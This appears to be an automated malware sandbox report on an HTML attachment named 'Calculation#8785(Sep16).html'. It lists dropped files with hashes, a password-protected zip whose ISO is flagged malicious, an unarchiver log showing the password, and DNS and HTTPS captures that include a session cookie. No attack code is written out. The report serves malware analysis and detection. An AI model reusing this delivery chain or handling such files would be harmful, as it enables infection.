                                                                                                          Preview:@...e...............................:................@..........H...............<@.^.L."My...:E..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)a.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10ki2tnl.si0.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddfxalct.zcq.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\7za.exe
                                                                                                          File Type:ISO 9660 CD-ROM filesystem data 'CD_ROM'
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1038336
                                                                                                          Entropy (8bit):6.407677009464969
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:FwadVwjHYHHWHCrwUwvPwewGHHQkg1H5wbgnS/4j5+/xH9YQUoIs95:FwadVwjHYHHWHCrwUwXwewGHHQkg1H5g
                                                                                                          MD5:43A7E6ABE10774F7B5DCDBC479E9742B
                                                                                                          SHA1:A293A24763DBDC78E71A93CA75FA635512710B37
                                                                                                          SHA-256:75F51C1238D8064298F231D387892C58BCA859EC7087FD10E6E1A0A493F6F30A
                                                                                                          SHA-512:D288B44610A2EF15ED99CAAE725B61E27EDBBD920F23895D41CB86270CA16A441801A99E448DBA2621345560649C91692DE6967F96EDBF9239D214D1F35A0749
                                                                                                          Malicious:true
                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\unarchiver.log

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\unarchiver.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1764
                                                                                                          Entropy (8bit):5.2307670297869695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:J6FgoGYGbYGYGpOGaHGYGpEQGbaG/QGwG7GYGRGYG7Grl3bgtrgt5:JCbM/
                                                                                                          MD5:DE45885E56CA3E0799B566EACD742DDB
                                                                                                          SHA1:337C24EEB8A852F2DEB4255739815959BFA13E5D
                                                                                                          SHA-256:3872748C66CFF48FE67F972E47DEA2831C44485FEEF6F7C9F995FE0A224DAA80
                                                                                                          SHA-512:FF0A24C6359C3E20366FDE98309A51ED024524B076644EEA1856E8A6524A03F42442CA306EF3EBBCA3C42977BCD98350AB99E84D4E50795D58A2BA4020F9E8B3
                                                                                                          Malicious:false
                                                                                                          Preview:09/16/2022 7:14 PM: Unpack: C:\Users\user\Downloads\Calculation#8785(Sep16).zip..09/16/2022 7:14 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\idbrycd1.fis..09/16/2022 7:14 PM: Use custom PW: abc444..09/16/2022 7:14 PM: Received from standard out: ..09/16/2022 7:14 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..09/16/2022 7:14 PM: Received from standard out: ..09/16/2022 7:14 PM: Received from standard out: Scanning the drive for archives:..09/16/2022 7:14 PM: Received from standard out: 1 file, 401948 bytes (393 KiB)..09/16/2022 7:14 PM: Received from standard out: ..09/16/2022 7:14 PM: Received from standard out: Extracting archive: C:\Users\user\Downloads\Calculation#8785(Sep16).zip..09/16/2022 7:14 PM: Received from standard out: --..09/16/2022 7:14 PM: Received from standard out: Path = C:\Users\user\Downloads\Calculation#8785(Sep16).zip..09/16/2022 7:14 PM: Received from standard out: Type = zip..09/16/2022 7:

                                                                                                          C:\Users\user\Downloads\Calculation#8785(Sep16).zip (copy)

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                          Category:dropped
                                                                                                          Size (bytes):401948
                                                                                                          Entropy (8bit):7.999561705433483
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:XoV4ebAunyTnF+xXSaGYiLgk8S+P2TeXlcZbqpAhBmu4i1XdfEfm3DbGs5:SbpnyLiXSZYcR+PWeXUPBmu5b13DT
                                                                                                          MD5:19CBE902D9B5CA858B99A9E9528C01D8
                                                                                                          SHA1:751A3E2E9F5886159B916DD3523014086B0F46CB
                                                                                                          SHA-256:3FA22F93DA3BC1D04F39A60B0AF23DDE8DD5AF876C059F01538F3D4DE4B0992E
                                                                                                          SHA-512:E0EC85CF9EF959B12D4881EABF09296FCC5C9E07475DE96AF5013B538BF623892FC6273FD3137A6FC9D8B07674EFEA7C2C698FB59323EE2B25727CFE68B2F731
                                                                                                          Malicious:false
                                                                                                          Preview:PK.........t0U....n!..........Calculation#8785.isoT....6....H......X...j.k..v...e...x#.a.Z...<...Dt..Mq.]}9.s...Jk..xWly.-{.yDH..>~Y..i......r]...S.yq.S=\x..4..5....k.........G.9 ....9{........Uza.....d.....5\.....F./..F.,..tW...&...F=6.=?@9.@k:.ja+&N_prb.@.7......@/.......&..u.?..;..............gb.....t.......r.)a..\._.T...........H7.qC.O.r.Q....m..A.%..&.,...O.JC@Ad..G.@.....3..f.d.O..&uy.wTJ.5J..ru...e.X..h.'.1=Zx.g..f..G......Z<7..027..%...Pw.!lq%f.....'.l...z..|h{.l..(7.5..qH.%T.j....m%.q.,.K..:.`....x.<...U$.?;F.x...{t.l#&....l.s...!...m...gWz....].....8..O-......o<=.5.Q.b.......9......=.K.Pt...).mE..#.#.xK...8,.b9#.<.f...t...p...i.c2zwX1.f...I...[d.Ow........Q....0}..-I3.7.......1.]lsOj3..Du.2...5........16.g.DK.`....C..5.z..zi&x..:wZ#.P.T.T..HT.R.H....q...e....L..4.*..3...Y..........E....w..F.I...........k /].A..4.!..[..W.Y3....A........#f.T_N9..o......O.....JogG...p)ty!5d...U.'......y.~..JA..G%.JgJh.#.p.y>.-.t..H.O.....Cv.h.'..

                                                                                                          C:\Users\user\Downloads\Calculation#8785(Sep16).zip.crdownload (copy)

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                          Category:dropped
                                                                                                          Size (bytes):401948
                                                                                                          Entropy (8bit):7.999561705433483
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:XoV4ebAunyTnF+xXSaGYiLgk8S+P2TeXlcZbqpAhBmu4i1XdfEfm3DbGs5:SbpnyLiXSZYcR+PWeXUPBmu5b13DT
                                                                                                          MD5:19CBE902D9B5CA858B99A9E9528C01D8
                                                                                                          SHA1:751A3E2E9F5886159B916DD3523014086B0F46CB
                                                                                                          SHA-256:3FA22F93DA3BC1D04F39A60B0AF23DDE8DD5AF876C059F01538F3D4DE4B0992E
                                                                                                          SHA-512:E0EC85CF9EF959B12D4881EABF09296FCC5C9E07475DE96AF5013B538BF623892FC6273FD3137A6FC9D8B07674EFEA7C2C698FB59323EE2B25727CFE68B2F731
                                                                                                          Malicious:false
                                                                                                          Preview:PK.........t0U....n!..........Calculation#8785.isoT....6....H......X...j.k..v...e...x#.a.Z...<...Dt..Mq.]}9.s...Jk..xWly.-{.yDH..>~Y..i......r]...S.yq.S=\x..4..5....k.........G.9 ....9{........Uza.....d.....5\.....F./..F.,..tW...&...F=6.=?@9.@k:.ja+&N_prb.@.7......@/.......&..u.?..;..............gb.....t.......r.)a..\._.T...........H7.qC.O.r.Q....m..A.%..&.,...O.JC@Ad..G.@.....3..f.d.O..&uy.wTJ.5J..ru...e.X..h.'.1=Zx.g..f..G......Z<7..027..%...Pw.!lq%f.....'.l...z..|h{.l..(7.5..qH.%T.j....m%.q.,.K..:.`....x.<...U$.?;F.x...{t.l#&....l.s...!...m...gWz....].....8..O-......o<=.5.Q.b.......9......=.K.Pt...).mE..#.#.xK...8,.b9#.<.f...t...p...i.c2zwX1.f...I...[d.Ow........Q....0}..-I3.7.......1.]lsOj3..Du.2...5........16.g.DK.`....C..5.z..zi&x..:wZ#.P.T.T..HT.R.H....q...e....L..4.*..3...Y..........E....w..F.I...........k /].A..4.!..[..W.Y3....A........#f.T_N9..o......O.....JogG...p)ty!5d...U.'......y.~..JA..G%.JgJh.#.p.y>.-.t..H.O.....Cv.h.'..

                                                                                                          C:\Users\user\Downloads\b61d9098-6d35-4a63-8391-2365d3e4d4ae.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                          Category:dropped
                                                                                                          Size (bytes):401948
                                                                                                          Entropy (8bit):7.999561705433483
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:XoV4ebAunyTnF+xXSaGYiLgk8S+P2TeXlcZbqpAhBmu4i1XdfEfm3DbGs5:SbpnyLiXSZYcR+PWeXUPBmu5b13DT
                                                                                                          MD5:19CBE902D9B5CA858B99A9E9528C01D8
                                                                                                          SHA1:751A3E2E9F5886159B916DD3523014086B0F46CB
                                                                                                          SHA-256:3FA22F93DA3BC1D04F39A60B0AF23DDE8DD5AF876C059F01538F3D4DE4B0992E
                                                                                                          SHA-512:E0EC85CF9EF959B12D4881EABF09296FCC5C9E07475DE96AF5013B538BF623892FC6273FD3137A6FC9D8B07674EFEA7C2C698FB59323EE2B25727CFE68B2F731
                                                                                                          Malicious:false
                                                                                                          Preview:PK.........t0U....n!..........Calculation#8785.isoT....6....H......X...j.k..v...e...x#.a.Z...<...Dt..Mq.]}9.s...Jk..xWly.-{.yDH..>~Y..i......r]...S.yq.S=\x..4..5....k.........G.9 ....9{........Uza.....d.....5\.....F./..F.,..tW...&...F=6.=?@9.@k:.ja+&N_prb.@.7......@/.......&..u.?..;..............gb.....t.......r.)a..\._.T...........H7.qC.O.r.Q....m..A.%..&.,...O.JC@Ad..G.@.....3..f.d.O..&uy.wTJ.5J..ru...e.X..h.'.1=Zx.g..f..G......Z<7..027..%...Pw.!lq%f.....'.l...z..|h{.l..(7.5..qH.%T.j....m%.q.,.K..:.`....x.<...U$.?;F.x...{t.l#&....l.s...!...m...gWz....].....8..O-......o<=.5.Q.b.......9......=.K.Pt...).mE..#.#.xK...8,.b9#.<.f...t...p...i.c2zwX1.f...I...[d.Ow........Q....0}..-I3.7.......1.]lsOj3..Du.2...5........16.g.DK.`....C..5.z..zi&x..:wZ#.P.T.T..HT.R.H....q...e....L..4.*..3...Y..........E....w..F.I...........k /].A..4.!..[..W.Y3....A........#f.T_N9..o......O.....JogG...p)ty!5d...U.'......y.~..JA..G%.JgJh.#.p.y>.-.t..H.O.....Cv.h.'..

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                          Entropy (8bit):6.132043959645223
                                                                                                          TrID:
                                                                                                          • HyperText Markup Language (15015/1) 20.56%
                                                                                                          • HyperText Markup Language (12001/1) 16.44%
                                                                                                          • HyperText Markup Language (12001/1) 16.44%
                                                                                                          • HyperText Markup Language (11501/1) 15.75%
                                                                                                          • HyperText Markup Language (11501/1) 15.75%
                                                                                                          File name:Calculation#8785(Sep16).html
                                                                                                          File size:763498
                                                                                                          MD5:7098151184920994fe048b20a9fbd57c
                                                                                                          SHA1:c0c017f604912f8d5f5d5104512fbca9b81c974b
                                                                                                          SHA256:fcc6ca0e284f527bfa0c8c9bc25f81389532cf7a2ddfd3e8c01ae2e7feb39ad1
                                                                                                          SHA512:e45391644f5f357b8065c87a577c5c2a71296ba26a7d3b60d5e3fbe6793b0deeb3d9bed7790dbff8e5a44bd74b20125dc1871d33d21c681c50dad6d04479cebb
                                                                                                          SSDEEP:12288:zRy9PHPgWWwSi1SYqZGmgjSXeKvXXthYsXT1gmzPZktSb66c:A9PoRi1R0kjKvthDTpzZbI
                                                                                                          TLSH:97F4CFEBF9C124098A63C25D90917BFD7D2F9547D7025AABB42B3B20CB496C70963E4C
                                                                                                          File Content Preview:<!DOCTYPE html>..<html class="wf-adobeclean-n9-active wf-adobeclean-n4-active wf-adobeclean-i4-active wf-adobeclean-n7-active wf-adobeclean-n3-active wf-adobeclean-n8-inactive wf-active" lang="en"><head><meta charset="UTF-8"><meta name="viewport" content=

                                                                                                          Network Behavior

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Sep 16, 2022 19:14:30.781058073 CEST49726443192.168.2.6142.250.184.45
                                                                                                          Sep 16, 2022 19:14:30.781120062 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.781198025 CEST49726443192.168.2.6142.250.184.45
                                                                                                          Sep 16, 2022 19:14:30.781703949 CEST49726443192.168.2.6142.250.184.45
                                                                                                          Sep 16, 2022 19:14:30.781728983 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.782944918 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:30.782993078 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.783103943 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:30.783310890 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:30.783337116 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.847995043 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.850737095 CEST49726443192.168.2.6142.250.184.45
                                                                                                          Sep 16, 2022 19:14:30.850779057 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.851871967 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.851989985 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.852076054 CEST49726443192.168.2.6142.250.184.45
                                                                                                          Sep 16, 2022 19:14:30.852689981 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:30.852724075 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.853060007 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.853133917 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:30.854418039 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.854506016 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:31.126092911 CEST49726443192.168.2.6142.250.184.45
                                                                                                          Sep 16, 2022 19:14:31.126390934 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.126439095 CEST49726443192.168.2.6142.250.184.45
                                                                                                          Sep 16, 2022 19:14:31.126660109 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:31.126982927 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.127099991 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:31.127121925 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.167386055 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.169212103 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.169316053 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:31.169348001 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.169433117 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.169517040 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:31.179718018 CEST49727443192.168.2.6142.250.180.174
                                                                                                          Sep 16, 2022 19:14:31.179755926 CEST44349727142.250.180.174192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.191447973 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.191549063 CEST49726443192.168.2.6142.250.184.45
                                                                                                          Sep 16, 2022 19:14:31.191587925 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.191715002 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:31.191826105 CEST49726443192.168.2.6142.250.184.45
                                                                                                          Sep 16, 2022 19:14:31.193463087 CEST49726443192.168.2.6142.250.184.45
                                                                                                          Sep 16, 2022 19:14:31.193491936 CEST44349726142.250.184.45192.168.2.6
                                                                                                          Sep 16, 2022 19:14:33.965471029 CEST49732443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:14:33.965534925 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:14:33.965627909 CEST49732443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:14:33.966037989 CEST49732443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:14:33.966073036 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:14:34.043471098 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:14:34.113121986 CEST49732443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:14:34.407634974 CEST49732443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:14:34.407687902 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:14:34.410959005 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:14:34.411137104 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:14:34.411175013 CEST49732443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:14:34.486881018 CEST49732443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:14:34.487201929 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:14:34.707374096 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:14:34.707484961 CEST49732443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:14:44.014328957 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:14:44.014410973 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:14:44.014674902 CEST49732443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:14:44.289216042 CEST49732443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:14:44.289262056 CEST44349732142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:15:33.770133972 CEST49799443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:15:33.770172119 CEST44349799142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:15:33.770266056 CEST49799443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:15:33.770637989 CEST49799443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:15:33.770656109 CEST44349799142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:15:33.832350969 CEST44349799142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:15:33.832889080 CEST49799443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:15:33.832914114 CEST44349799142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:15:33.833344936 CEST44349799142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:15:33.834192038 CEST49799443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:15:33.834341049 CEST44349799142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:15:33.877610922 CEST49799443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:15:43.814758062 CEST44349799142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:15:43.814903975 CEST44349799142.250.184.100192.168.2.6
                                                                                                          Sep 16, 2022 19:15:43.814986944 CEST49799443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:15:44.167948008 CEST49799443192.168.2.6142.250.184.100
                                                                                                          Sep 16, 2022 19:15:44.167974949 CEST44349799142.250.184.100192.168.2.6

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Sep 16, 2022 19:14:30.747745037 CEST5490353192.168.2.68.8.8.8
                                                                                                          Sep 16, 2022 19:14:30.755414963 CEST5153053192.168.2.68.8.8.8
                                                                                                          Sep 16, 2022 19:14:30.774255037 CEST53549038.8.8.8192.168.2.6
                                                                                                          Sep 16, 2022 19:14:30.781635046 CEST53515308.8.8.8192.168.2.6
                                                                                                          Sep 16, 2022 19:14:32.158396959 CEST5394353192.168.2.68.8.8.8
                                                                                                          Sep 16, 2022 19:14:33.854310989 CEST5654753192.168.2.68.8.8.8
                                                                                                          Sep 16, 2022 19:14:33.872088909 CEST53565478.8.8.8192.168.2.6
                                                                                                          Sep 16, 2022 19:14:33.937418938 CEST5988153192.168.2.68.8.8.8
                                                                                                          Sep 16, 2022 19:14:33.963018894 CEST53598818.8.8.8192.168.2.6

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Sep 16, 2022 19:14:30.747745037 CEST192.168.2.68.8.8.80xad63Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                          Sep 16, 2022 19:14:30.755414963 CEST192.168.2.68.8.8.80x37b9Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                          Sep 16, 2022 19:14:32.158396959 CEST192.168.2.68.8.8.80xd481Standard query (0)use.typekit.netA (IP address)IN (0x0001)false
                                                                                                          Sep 16, 2022 19:14:33.854310989 CEST192.168.2.68.8.8.80x295bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                          Sep 16, 2022 19:14:33.937418938 CEST192.168.2.68.8.8.80x9151Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Sep 16, 2022 19:14:30.774255037 CEST8.8.8.8192.168.2.60xad63No error (0)accounts.google.com142.250.184.45A (IP address)IN (0x0001)false
                                                                                                          Sep 16, 2022 19:14:30.781635046 CEST8.8.8.8192.168.2.60x37b9No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Sep 16, 2022 19:14:30.781635046 CEST8.8.8.8192.168.2.60x37b9No error (0)clients.l.google.com142.250.180.174A (IP address)IN (0x0001)false
                                                                                                          Sep 16, 2022 19:14:32.180176973 CEST8.8.8.8192.168.2.60xd481No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Sep 16, 2022 19:14:33.872088909 CEST8.8.8.8192.168.2.60x295bNo error (0)www.google.com142.250.184.100A (IP address)IN (0x0001)false
                                                                                                          Sep 16, 2022 19:14:33.963018894 CEST8.8.8.8192.168.2.60x9151No error (0)www.google.com142.250.184.100A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • accounts.google.com
                                                                                                          • clients2.google.com

                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.649726142.250.184.45443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-09-16 17:14:31 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                          Host: accounts.google.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 1
                                                                                                          Origin: https://www.google.com
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: __Secure-ENID=6.SE=Md0Ynyf9ahpkx1CxTGF0vY434NJ6ymH-gDI2Tl5Ly-NQYGPjnNfggtiFRMAwx4JRDOC_gavEPcD5cTBJzUgtbJobmBEuJ8xi2UuotxvOZgApoqSIg1b0RP47U08XG8Bz_SExSzKy0ETSsajbToDlYyFsxfI93p7AyRAd-OeIBA0; CONSENT=PENDING+070
                                                                                                          2022-09-16 17:14:31 UTC0OUTData Raw: 20
                                                                                                          Data Ascii:
                                                                                                          2022-09-16 17:14:31 UTC2INHTTP/1.1 200 OK
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Access-Control-Allow-Origin: https://www.google.com
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Fri, 16 Sep 2022 17:14:31 GMT
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                          Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-4fpJQXvYROXKmdWXm94GJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Server: ESF
                                                                                                          X-XSS-Protection: 0
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                          Accept-Ranges: none
                                                                                                          Vary: Accept-Encoding
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
                                                                                                          2022-09-16 17:14:31 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                          Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                          2022-09-16 17:14:31 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


